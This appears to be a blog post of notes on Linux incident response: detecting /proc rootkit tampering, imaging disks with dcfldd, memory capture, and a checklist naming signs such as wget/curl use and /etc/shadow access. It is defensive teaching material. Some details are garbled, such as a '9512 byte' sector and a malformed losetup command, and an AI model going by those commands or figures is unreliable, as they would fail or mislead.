Process Tampering in the /proc Filesystem


Most Linux user-space tools (e.g., ps, netstat) retrieve process information from the /proc filesystem. Rootkits attempt to hide their malicious processes by manipulating /proc/<PID> directories.


To detect this tampering:


  • Attempt to cd into each /proc/<PID> directory.

  • If a directory listed in /proc does not exist, it suggests that a Linux Kernel Module (LKM) rootkit is hiding process-related information.


Checking logs for information related to rootkits.


dmesg

/var/log/kern.log

/var/log/dmesg*


Console based attacks




Linux Disk Forensics


Linux Disk Overview


  • Blocks hold data

  • The smallest addressable unit is sector (9512 byte)

  • For efficiency to disk reads are done in 512 bytes segments.

  • In Linux file systems a file may be less than a sector, but the rest of the block is empty (This also how you know how you reached the end of the file).

  • If files are larger than a block it spans multiple blocks.  Linux tries to keep the blocks together it will be stored in a super block.  If file is larger than its fragmented.  But this is rarer.

  • This makes recovery data easier.  If you find start of file.  Then the rest of file should be in the blocks directly next to it.

  • Meta data is stored in INODE.  INODE contains all the info that you see output with the 'ls' command (file types, access rights, owner, timestamps, size, pointer to data blocks).  But INODE doesn’t have file name

  • File name layer – A directory is nothing more than a list of file names and INODE numbers


Linux Disk Forensics Overview


  • if the Linux system is running on a VM it is easiest to get a snapshot of the VM to get a disk and memory images. However, in order to analyze the disk image from the snapshot with your forensic software you may have to convert it into a raw disk image.

  • Imaging a physical device:

    • Free capture tools:

  • If you are analyzing disk images with the Linux and Open Source forensic toolchain, then the forensics images need to be in raw form. Common forensic formats such as E01, AFF, and even split raw are not directly usable by many Linux commands.



Imaging Linux - Physical device - dcfldd


List out disks with fdisk.


Disk partition management with parted. This will see show you how much space is on each partition and the file system type.

Specify the data point you are copying the data to (for example, forensics USB). This is mimicking that forensic analysis drove as dev/sdb.


Creating a new partition on acquired drive.

  • Enter m at the prompt to see options.

  • You want to create a new partition (type "n"). You will make the partition number 1 and primary and accept the defaults

  • Once partition is created, type "w" which will write the partition to the table and exit fdisk


Adding a file system to the acquired drive so data can be added.

Rerun fdisk -l and parted -l and you should see the valid partition.



Making a mount point for the new partition/file system and mounting it to the mount point.


  • mkdir is make directory

  • /mnt/driveloc is simply the folder location you are creating. So now you have a folder called mnt, and within that a folder called driveloc

  • Now that the location has been created, you need to mount sdb1 to that location. This will let you see the contents of sdb1. Use the command mount /dev/sdb1 /mnt/driveloc to mount the sdb1 drive to the folder driveloc.



Using the Linux tool dcfldd duplicate the drive /dev/sdb1.  Create both md5 and sha256 hashes of the drive.  Place the copy of the drive in /root and name it driveimage.dd


  • The command begins with dcfldd. if=/dev/sdb1 designates the drive that will be copied in the disk

  • hash=md5,sha256 designates the types of hashes to be generated as the disk image is created.

  • md5log=/root/md5.txt sha256log=/root/sha256.txt designates that the hash logs are going to be printed to two text files within the root folder; that is, within the Home

  • hashconv=after designates that the hash values will be written after the disk conversion. Alternatively, 'before' can be selected.

  • conv=noerror,sync means that if there are read errors when creating the disk image, dcfldd will write

  • of=/root/driveimage.dd is the disk image file that will be created. /root ensures that it will be written to the Home

  • dcfldd will also print out how many records were copied during the creation of the disk image.

  • The hash logs and disk image file should now be in the Home Folder.  If you open the hash logs you can view the hashes of the image disk that was created. 


Change the permissions of the drive copy to “read only” so it cannot be tampered with.

  • chmod a-w /root/driveimage.dd in order to change the permissions to read-only.

Calculate md5 and sha256 of the original suspect drive.

  • sha256sum /dev/sdb1 > /root/original.sha256.txt

  • md5sum /dev/sdb1 > /root/original.md5.txt

Compare the original suspect drive md5sum hash to the hash value logged for the copy of the previously imaged drive using dcfldd.

Compare the original suspect drive sha256 hash to the hash value logged for the copy of the previously imaged drive using dcfldd.



Example using dc3dd

dc3dd if=/dev/sdb1 of=/evidemce/image.dd hash=sha256 hashlog=hash.log log-image.log

Analyzing the Linux disk data with Linux based tool chain


  • Linux file systems are often encapsulated within additional layers of complexity which can include:

  • Linux’s built-in disk encryption system (dm-crypt and LUKS)

  • software RAID capabilities.

  • Linux Logical Volume Management (LVM) is a very common “soft partitioning” scheme that allows file systems to be resized on the fly


Other Linux tool chain notes:


Linux command want to operate on a disk device, not a disk image file.  Fake them out by using a virtual “loopback” device.  Losetup command associates a loopback device with a raw disk image.


Losetup -rf -0 $((501760*512)


Forensically copied file system is dirty “underplayed”.  When forensic image was taken the OS was still running.  There are transactions within file system journal that need to be taken care of. But forensically we said Read only. Reality is file system is probably good enough shape.  Try to force the file system to load without worrying about the journal.  That is the ‘noload’ option


Linux Memory Forensics


Memory forensics is a critical component of incident response, offering unique insights that cannot be obtained from traditional disk forensics. Key values include:


  • Detection of Memory-Resident Malware: Identifies malware that operates solely in memory and does not leave traces on disk, such as fileless malware.

  • Recovery of Volatile Data: Captures transient information like active processes, open network connections, and encryption keys that disappear upon system shutdown.

  • Rootkit Detection: Exposes rootkits hiding malicious activity by comparing in-memory data with on-disk or system-reported information.

  • Insight into Suspicious Processes: Enables the analysis of process execution, including injected code and hidden threads

  • Network Analysis: Provides details on live connections, unencrypted data, and session activity.

  • Attack Reconstruction: Helps recreate an attacker’s actions by analyzing artifacts like command execution, loaded modules, and memory dumps of running applications.


Memory analysis begins with acquiring a memory dump, which serves as the foundation for further investigation. The approach depends on whether the system is running as a virtual machine (VM) or physical hardware:


  • Virtual Machines: Memory can be extracted directly from VM files.

  • Physical Systems: Memory must be acquired from the running system. Many Linux systems provide access to physical memory via /proc/kcore, a file that represents the system's RAM in a core file format. While it displays a size equal to the physical memory plus 4 KB, it is not human-readable and is intended for use with debuggers like gdb. Avoid using tools like cat to read this file.


Tools for Linux Memory Acquisition


Microsoft AVML (Acquire Volatile Memory for Linux):


  • Open-source tool developed in Rust.

  • Captures memory without loading a kernel driver, reducing system impact.

  • Saves the memory image locally, which can risk overwriting evidence unless redirected to external storage.


Linux Memory Grabber (LMG):


  • A shell script by Hal Pomeranz that automates Linux memory acquisition.

  • Uses /proc/kcore or /dev/crash if available.

  • Can build and load the LiME (Linux Memory Extractor) kernel module when necessary.

  • Facilitates memory dumping and creates a Volatility profile for analysis.


After capturing the system memory, it can then be analyzed with the memory analysis tool Volatility: https://github.com/volatilityfoundation/volatility/wiki/Linux-Command-Reference




Linux Incident Response Checklist


Suspicious network connections


  • Found by sensor/instrumentation outside of server?

  • Netstat analysis. Suspicious network connection found?


Logon analysis


  • /var/log/wtmp

  • /var/log/btmp

  • /var/log/lastlog

  • /var/log/secure

  • /var/log/audit

  • /var/log/journal


Suspicious process analysis


  • Suspicious process found?

  • Process exe hash analysis

    • Hash found in CTI

  • Process exe cmdline analysis

  • Process exe strings analysis

  • Process exe status analysis

  • is suspicious binary behind process in memory only?


Persistence analysis


  • Cron jobs?

  • Processes set to start (systemD)

  • User analysis

    • Added users?

    • Edited users?

    • Enabled users

    • Users UID 0

  • Shell profile analysis

  • SSH keys analysis


Bash log analysis


Defense evasion analysis


  • Shell history tampering?

  • Stopping/deleting logs?

  • Stopping/editing firewalls?

  • Stopping/editing AV/EDR?


Search for signs of discovery


  • System enumeration

  • Accessing sensitive files (/etc/shadow)


Search for signs of Command & Control


  • Web activity

    • wget usage

    • curl usage

  • Web shells

  • Web logs


Search for signs of privilege escalation


  • Kernel exploits

  • Application vulnerabilities

  • Misconfigurations such as weak file permissions

  • Abuse of sudo

  • Abuse of setuid and setgid


Search for signs of lateral movement


Search for signs of exfiltration


  • Zip files and staging


Other analysis


  • System changes

  • Analysis of /tmp

  • Deleted files

  • Rootkits


References


Linux Proc forensics:




Linux Command line forensics sheet:


bash scripts for Linux IR:



Linux Persistence:



PANIX 'Persistence Against NIX":



Linux lsof troubleshooting:



Systemd services:



Journalctl:


Linux priv escalation:


Linux rootkits:





Linux rootkits (with PID hiding detection script):


Fortinet writeup on Ivanti Kernel rootkit:


Linux memory:


Linux r4sponse data collection scripts:












Disabling audit logs:


Package manager persistence:


FirewallD Geo Blocking:


Linux Compression:


Privilege escalation:


Bash history:


Logging bash history to an external syslog server:


Logging bash history with trap:


Logging bash history with shopt:


dd, dc3dd and dcfldd:

6 views0 comments

Recent Posts

See All

Comments


Post: Blog2_Post
bottom of page